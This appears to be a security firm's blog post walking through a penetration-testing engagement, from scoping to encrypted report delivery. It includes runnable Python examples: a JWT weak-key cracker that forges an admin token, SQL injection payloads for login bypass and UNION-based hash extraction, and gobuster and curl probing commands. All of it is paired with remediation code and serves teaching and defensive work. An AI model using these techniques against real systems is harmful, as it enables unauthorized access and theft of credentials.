From First Contact to Final Report: Inside Our Penetration Testing Process
A step-by-step walkthrough of how a professional penetration testing engagement works - from the initial client conversation through scoping, active testing, and secure report delivery.
Written by
KleoSEC Team
Published
February 12, 2026
Reading time
8 min read
Most organizations know they need a penetration test. Far fewer understand what actually happens during one. The process is often perceived as a black box - you hand over access, wait a few weeks, and receive a PDF full of findings. But a professional pentest is a structured, collaborative engagement with clear phases, constant communication, and rigorous methodology.
In this post, we'll walk through every stage of a typical KleoSEC penetration testing engagement, from the moment a client reaches out to the second we hit "Send Securely" on the final report.
The Client Reaches Out
Every engagement starts the same way: someone has a security concern.
Maybe it's a CEO preparing for a product launch who needs assurance that the platform won't be compromised on day one. Maybe it's a compliance requirement from a client or regulator. Or maybe a recent breach in the industry has made the board nervous. Whatever the trigger, the first step is always a conversation.
A typical initial request looks something like this:
"We need a comprehensive security assessment before our platform launch. Can you help?"
Our response is straightforward. We schedule a kick-off call to understand the business context, technical landscape, and what the client is most concerned about. Before any technical work begins, we handle the essentials:
- NDA signed - mutual confidentiality is non-negotiable
- Kick-off call - we meet the stakeholders and technical team
- Timeline agreed - both sides align on dates, communication channels, and escalation procedures
This phase is short but critical. It sets the tone for the entire engagement. A pentest is a partnership, not a transaction, and building trust early makes everything that follows more effective.
Scoping & Planning
Scoping is where the engagement takes shape. This is a collaborative process - we work directly with the client's technical team to define exactly what's in scope and how we'll approach it.
The conversation usually goes like this:
Client: "We need a thorough security assessment before our public launch."
KleoSEC: "Understood. Which systems should be in scope?"
Client: "Our main web app, the REST API, and the admin panel."
KleoSEC: "Perfect. Here's the proposed scope."
From there, we formalize the target list. For a typical web application engagement, this might include:
- app.acme-digital.com - the primary web application
- api.acme-digital.com - the backend REST API
- admin.acme-digital.com - the administrative interface
We also define the methodology and testing approach at this stage:
| Parameter | Decision |
|---|---|
| Standard | OWASP Top 10, OWASP ASVS |
| Framework | PTES (Penetration Testing Execution Standard) |
| Approach | Grey-box (authenticated + unauthenticated testing) |
| Duration | Typically 1–3 weeks depending on scope size |
Grey-box testing means we receive some level of access, usually user-level credentials and basic documentation, so we can test both as an external attacker and as an authenticated user. This approach maximizes coverage and reflects realistic threat scenarios, since many real-world attacks come from compromised accounts rather than purely external vectors.
The scoping phase produces a formal Statement of Work that both parties sign. No ambiguity, no scope creep, no surprises.
Active Penetration Testing
This is where the real work happens. Our security engineers systematically probe every target in scope, combining automated tooling with extensive manual testing. Automated scanners catch the low-hanging fruit, but the high-severity findings (the ones that actually matter) almost always come from manual analysis and creative thinking.
A typical testing session involves multiple attack vectors running in parallel:
Reconnaissance & Discovery
We start with enumeration - mapping out the attack surface. This includes directory brute-forcing, API endpoint discovery, technology fingerprinting, and analyzing client-side JavaScript for hidden endpoints or sensitive data.
$ gobuster dir -u https://app.acme-digital.com -w api-endpoints.txt
/api/v1/users (Status: 200)
/api/v1/admin (Status: 302)
/api/v1/debug (Status: 200)
Every discovered endpoint gets catalogued and tested individually; a 302 on /api/v1/admin, for instance, still tells us the route exists and is worth probing both with and without a session. It's meticulous work, but thoroughness is what separates a professional pentest from a vulnerability scan.
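Directory brute-forcing only finds what is on the wordlist; routes the front end calls directly are often visible only in the JavaScript bundle. The script below is an added example (not KleoSEC's tooling) that extracts candidate endpoints from a constructed bundle, resolves relative paths against an assumed API origin, folds string-concatenated routes into one parameterised entry, drops static assets and query strings, and returns the catalogue to be tested one by one. The hostname and routes in the sample are placeholders.

```python
"""Added example, not KleoSEC tooling: harvest API endpoints from a JS bundle.

SAMPLE_BUNDLE is a constructed stand-in for a minified front-end bundle; the
hostname and routes in it are placeholders, not real targets.
"""
import re
from urllib.parse import urljoin, urlsplit

SAMPLE_BUNDLE = r"""
const BASE="https://api.acme-digital.com";
fetch(BASE+"/api/v1/users",{credentials:"include"});
axios.get('/api/v1/users/'+id+'/orders');
const ADMIN_ROUTE = "/api/v1/admin/export?format=csv";
if(DEBUG){fetch("/api/v1/debug")}
const img="/static/img/logo.png"; // static asset, not an API endpoint
"""

# 'literal' + variable + 'literal' -> one route with a {param} placeholder,
# rewritten before literal extraction so the two halves are not listed apart.
_CONCAT_RE = re.compile(
    r"""(["'])(/[^"']*)\1\s*\+\s*[A-Za-z_$][\w$.]*\s*\+\s*(["'])(/[^"']*)\3"""
)
# Quoted string literals that look like an absolute URL or a root-relative path.
_PATH_RE = re.compile(
    r"""["'`]((?:https?://[^"'`\s]+)|(?:/[A-Za-z0-9_./%?=&:{}-]*))["'`]"""
)
_STATIC_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico",
               ".css", ".js", ".map", ".woff", ".woff2")


def extract_endpoints(js: str, base: str = "https://api.acme-digital.com") -> list:
    """Return a sorted, de-duplicated list of endpoints referenced in `js`.

    Relative paths are resolved against `base`, query strings are dropped so a
    route is listed once regardless of parameters, and static assets are skipped.
    """
    js = _CONCAT_RE.sub(lambda m: '"' + m.group(2) + "{param}" + m.group(4) + '"', js)
    found = set()
    for m in _PATH_RE.finditer(js):
        url = urljoin(base, m.group(1)).split("?", 1)[0]
        parts = urlsplit(url)
        if parts.path in ("", "/"):            # bare origin, nothing to test
            continue
        if parts.path.lower().endswith(_STATIC_EXT):
            continue
        found.add(url)
    return sorted(found)


if __name__ == "__main__":
    for endpoint in extract_endpoints(SAMPLE_BUNDLE):
        print(endpoint)
```

The `{param}` entries are the ones to test first for authorization flaws: they are exactly where an object identifier is substituted into the path, which is the shape of the IDOR finding reported later in this post.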
Exploitation & Validation
When we find a potential vulnerability, we don't just flag it - we prove it. Every finding is validated with a working proof of concept. If we claim there's a SQL injection, we demonstrate data extraction. If we find an authentication bypass, we show exactly what an attacker could access.
$ curl -d "user=admin'--" https://api.acme-digital.com/auth
{"error":"SQL syntax near..."}
$ python3 jwt_crack.py --token eyJ...
[✓] Key found: "secret123"
An error message like the one above is only the first indicator; the finding is written up once we have gone on to demonstrate the actual bypass or data extraction. This validation step is essential. It eliminates false positives and gives the client's development team actionable evidence they can use to reproduce and fix the issue.
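To show what "we prove it" means for the JWT finding, here is an added example (not KleoSEC's jwt_crack.py) that recovers a weak HS256 signing key by trying a wordlist against the token's signature, then demonstrates impact by minting a role-escalated token the server would accept. It uses only the standard library; the token, wordlist and the key "secret123" are constructed for the example.

```python
"""Added example, not KleoSEC's jwt_crack.py: recover a weak HS256 signing key
by brute force, then prove the impact by minting a privileged token with it.
Standard library only.

The token, wordlist and key below are constructed for the example; "secret123"
is the weak key shown in the article's sample output.
"""
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 (what the server does)."""
    compact = {"separators": (",", ":")}
    signing_input = (_b64url(json.dumps(header, **compact).encode()) + "."
                     + _b64url(json.dumps(payload, **compact).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_hs256(token: str, key: bytes):
    """Server-side check: the payload dict if the signature is valid, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":            # no alg=none, no algorithm confusion
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(payload_b64))


def crack_hs256(token: str, wordlist):
    """Return the first wordlist entry that reproduces the token's signature, or None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("not an HS256 token")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = _b64url_decode(sig_b64)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def forge_privileged_token(token: str, key: str) -> str:
    """Proof of impact: re-issue the captured token as role=admin under the cracked key."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    payload = json.loads(_b64url_decode(payload_b64))
    payload["role"] = "admin"
    return sign_hs256(header, payload, key.encode())


# Constructed sample: a token a low-privilege user would hold, signed with the
# weak key, and a small wordlist that happens to contain that key.
WEAK_KEY = b"secret123"
CAPTURED_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                            {"sub": "1042", "role": "user"}, WEAK_KEY)
WORDLIST = ["password", "changeme", "jwtsecret", "secret123", "letmein"]

if __name__ == "__main__":
    key = crack_hs256(CAPTURED_TOKEN, WORDLIST)
    print("key found:", key)
    forged = forge_privileged_token(CAPTURED_TOKEN, key)
    print("forged token accepted as:", verify_hs256(forged, WEAK_KEY))
```

The remediation that goes with this finding is the same regardless of how long the wordlist run took: an HS256 key needs at least 256 bits of real randomness (for example `secrets.token_bytes(32)`), or the service moves to an asymmetric algorithm such as ES256 so the verifying side never holds a signing secret at all.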
Findings as They Emerge
Throughout testing, findings are scored with CVSS v4.0 and labelled from the standard severity bands (Critical 9.0–10.0, High 7.0–8.9, Medium 4.0–6.9, Low 0.1–3.9), so the label always follows the score:
| Severity | Example Finding | CVSS |
|---|---|---|
| Critical | Authentication Bypass via SQL Injection | 9.8 |
| Critical | Stored XSS in Profile Editor | 9.1 |
| High | IDOR on User API Endpoint | 8.2 |
| High | JWT Weak Signing Key | 7.5 |
| Medium | Missing Rate Limiting on Login | 5.3 |
| Low | Verbose Error Messages | 3.1 |
For critical and high-severity findings, we follow a real-time notification protocol. If we discover something that poses an immediate risk, like an authentication bypass or remote code execution, we notify the client immediately rather than waiting for the final report. Security shouldn't wait for paperwork.
By the end of a typical engagement, we've run hundreds of individual tests across all in-scope targets. In one recent engagement, that looked like 18 confirmed findings across 247 tests on 12 distinct endpoints.
Documenting Everything
Raw findings are useless without context. That's why we built our own custom report platform - a purpose-built application for documenting penetration test results with the precision and detail that development teams actually need to fix things.
Every finding goes through a structured documentation process:
- Vulnerability description - full narrative describing the vulnerability, its impact, and the attack chain
- CVSS scoring - standardized severity ratings so teams can prioritize remediation
- Evidence/Proof of Concept - screenshots, request/response pairs, and proof-of-concept code attached directly to each finding
- Remediation guidance - specific, actionable fix recommendations tailored to the client's technology stack
We don't use generic templates or copy-paste descriptions from vulnerability databases. Every finding is written from scratch based on what we actually observed in the client's environment. This matters because a SQL injection in a user search endpoint requires different remediation than one in an admin login form, even though they share the same vulnerability class.
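The point about remediation differing by context is easiest to see with the two SQL injections from this post side by side. The following is an added example (not KleoSEC's code) on an in-memory SQLite database with constructed users: the admin login version of the bug yields an authentication bypass and is fixed by binding the parameter and comparing the password hash in code; the user search version yields data extraction through a UNION and, because the input lands inside a LIKE pattern, binding alone is not enough, the wildcards have to be escaped too.

```python
"""Added example, not KleoSEC's code: one vulnerability class, two endpoints,
two different fixes. Runs against an in-memory SQLite database populated
with constructed sample users.
"""
import hashlib
import hmac
import sqlite3


def _pw_hash(password: str) -> str:
    # Stand-in for the demo; a real login must use a slow hash (argon2id/bcrypt).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", _pw_hash("CorrectHorseBatteryStaple"), "admin"),
        (2, "alice", _pw_hash("hunter2"), "user"),
        (3, "bob_jones", _pw_hash("tr0ub4dor"), "user"),
    ])
    return conn


# --- Admin login: the injection yields an authentication bypass ---------------

def login_vulnerable(conn, username: str, password: str):
    # Concatenation: username "admin'--" turns the rest of the WHERE into a comment.
    query = (f"SELECT username, role FROM users WHERE username = '{username}' "
             f"AND pw_hash = '{_pw_hash(password)}'")
    return conn.execute(query).fetchone()


def login_fixed(conn, username: str, password: str):
    # Fix: bind the parameter, fetch the stored hash, compare it in code.
    row = conn.execute("SELECT username, role, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None or not hmac.compare_digest(row[2], _pw_hash(password)):
        return None
    return (row[0], row[1])


# --- User search: the injection yields data extraction ------------------------

def search_vulnerable(conn, term: str) -> list:
    # Concatenation inside a LIKE pattern: a UNION pulls other columns into the result.
    query = f"SELECT username FROM users WHERE username LIKE '%{term}%'"
    return [row[0] for row in conn.execute(query)]


def search_fixed(conn, term: str) -> list:
    # Fix: bind the pattern AND escape LIKE wildcards; otherwise a user-supplied
    # "%" or "_" still matches every row even though the injection is gone.
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    rows = conn.execute("SELECT username FROM users WHERE username LIKE ? ESCAPE '\\'",
                        (f"%{escaped}%",))
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    print("bypass:", login_vulnerable(conn, "admin'--", "wrong"))
    print("fixed :", login_fixed(conn, "admin'--", "wrong"))
    leak = "%' UNION SELECT pw_hash FROM users--"
    print("leak  :", search_vulnerable(conn, leak))
    print("fixed :", search_fixed(conn, leak))
```

The search fix is the kind of detail a copy-pasted "use prepared statements" recommendation misses: after parameterising, a search for `_` in the vulnerable version still returns every user, while the escaped version returns only the one name that contains a literal underscore.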
The Final Report
The deliverable is a comprehensive PDF report that serves two audiences: executives who need to understand risk at a strategic level, and engineers who need technical detail to fix the issues.
Executive Summary
The report opens with a high-level overview written in business language:
"During the assessment period, KleoSEC identified 18 vulnerabilities across the target web application infrastructure. 2 Critical and 5 High severity findings require immediate attention."
This is accompanied by a visual severity breakdown and an overall risk rating (in this case: HIGH, with an average CVSS score of 7.4). Executives can read this single page and understand exactly where the organization stands.
Technical Findings
Each finding gets its own detailed section with:
| ID | Title | Severity | CVSS |
|---|---|---|---|
| F-001 | SQL Injection - User Search | Critical | 9.8 |
| F-002 | Stored XSS - Profile Editor | Critical | 9.1 |
| F-003 | IDOR - /api/v1/users/:id | High | 8.2 |
| F-004 | JWT Weak Signing Key | High | 7.5 |
| F-005 | Missing Rate Limiting | Medium | 5.3 |
| F-006 | Verbose Error Messages | Low | 3.1 |
Every entry includes the full description, reproduction steps, evidence (screenshots and HTTP requests/responses), impact analysis, and specific remediation steps.
Secure Delivery
A penetration test report contains some of the most sensitive information about an organization's security posture. Treating it casually would be irresponsible. That's why every report we deliver goes through a secure delivery process:
- AES-256 encryption - the report PDF is packaged and encrypted before it ever leaves our systems
- Secure transmission - delivered directly to authorized recipients only
- Access control - we confirm recipient identity before sharing decryption credentials through a separate channel
The decryption password is never sent in the same communication as the report itself, so an intercepted email yields only ciphertext. That guarantee holds as far as the second channel is genuinely separate from the first and the passphrase is long and random enough that the encrypted file cannot be brute-forced offline.
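For the mechanics of that packaging step, here is an added example (not KleoSEC's delivery tooling) that generates a random passphrase intended for the second channel, encrypts the report with AES-256 under a PBKDF2-derived key, and gives the recipient an integrity check to run before decrypting. It shells out to the openssl command-line tool, which is assumed to be installed; the file names are placeholders.

```python
"""Added example, not KleoSEC's delivery tooling: package a report with
AES-256 under a random passphrase that is meant to travel over a second
channel, and let the recipient verify integrity before decrypting.

Shells out to the openssl CLI (assumed installed, 1.1.1 or 3.x). File names
are placeholders.
"""
import hashlib
import hmac
import os
import secrets
import subprocess
from pathlib import Path

PBKDF2_ITERATIONS = 600_000   # slows offline guessing if the ciphertext leaks


def generate_passphrase() -> str:
    """24 random bytes as URL-safe base64 (32 chars): share over the second channel."""
    return secrets.token_urlsafe(24)


def _openssl_enc(args, passphrase: str) -> None:
    # The passphrase goes through the environment, not argv, so it is not
    # visible in `ps` output or shell history.
    env = dict(os.environ, REPORT_PASS=passphrase)
    subprocess.run(
        ["openssl", "enc", *args, "-pbkdf2", "-iter", str(PBKDF2_ITERATIONS),
         "-pass", "env:REPORT_PASS"],
        env=env, check=True, capture_output=True,
    )


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def encrypt_report(src: Path, passphrase: str) -> Path:
    """Encrypt src -> src.enc and write a digest manifest next to it."""
    enc = Path(str(src) + ".enc")
    _openssl_enc(["-aes-256-cbc", "-salt", "-in", str(src), "-out", str(enc)], passphrase)
    # openssl enc provides confidentiality only, no integrity: the digest lets the
    # recipient detect a swapped or truncated ciphertext before decrypting.
    Path(str(enc) + ".sha256").write_text(sha256_file(enc) + "\n")
    return enc


def decrypt_report(enc: Path, passphrase: str, out: Path) -> bool:
    """Recipient side: check the digest, then decrypt. False if either step fails."""
    expected = Path(str(enc) + ".sha256").read_text().strip()
    if not hmac.compare_digest(sha256_file(enc), expected):
        return False
    try:
        _openssl_enc(["-d", "-aes-256-cbc", "-in", str(enc), "-out", str(out)], passphrase)
    except subprocess.CalledProcessError:
        return False
    return True


if __name__ == "__main__":
    import tempfile
    workdir = Path(tempfile.mkdtemp())
    report = workdir / "report.pdf"
    report.write_bytes(b"placeholder report body")          # constructed stand-in
    passphrase = generate_passphrase()                      # -> second channel
    encrypted = encrypt_report(report, passphrase)          # -> first channel
    print("send:", encrypted, "and", str(encrypted) + ".sha256")
    print("decrypt ok:", decrypt_report(encrypted, passphrase, workdir / "out.pdf"))
```

The digest only authenticates the file if it is confirmed over the same out-of-band call that carries the passphrase; sent alongside the ciphertext it merely catches corruption, since whoever can swap the file can swap the digest. A tool with built-in authenticated encryption such as gpg --symmetric or age avoids that extra step.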
Once the report is delivered, we schedule a findings walkthrough call where we review every finding with the client's technical team, answer questions, and discuss remediation priorities. Security is collaborative - the report is a starting point for fixing things, not an end in itself.
What Happens After
A good pentest doesn't end with the report. We offer remediation verification. Once the client's team has addressed the findings, we re-test the specific vulnerabilities to confirm they've been properly fixed. This closes the loop and gives the organization documented proof that identified risks have been mitigated.
For clients with ongoing security needs, we also provide continuous engagement models where we perform regular assessments as the application evolves, ensuring that new features and changes don't introduce fresh vulnerabilities.
Every penetration test is different. The targets change, the findings vary, and the technical challenges are unique. But the process - the discipline of structured scoping, methodical testing, thorough documentation, and secure delivery - stays consistent. It's what separates a professional security assessment from someone running a scanner and emailing you the output.
If your organization is preparing for a launch, facing a compliance requirement, or simply wants to understand its security posture, we'd be happy to walk you through how a KleoSEC engagement would work for your specific situation.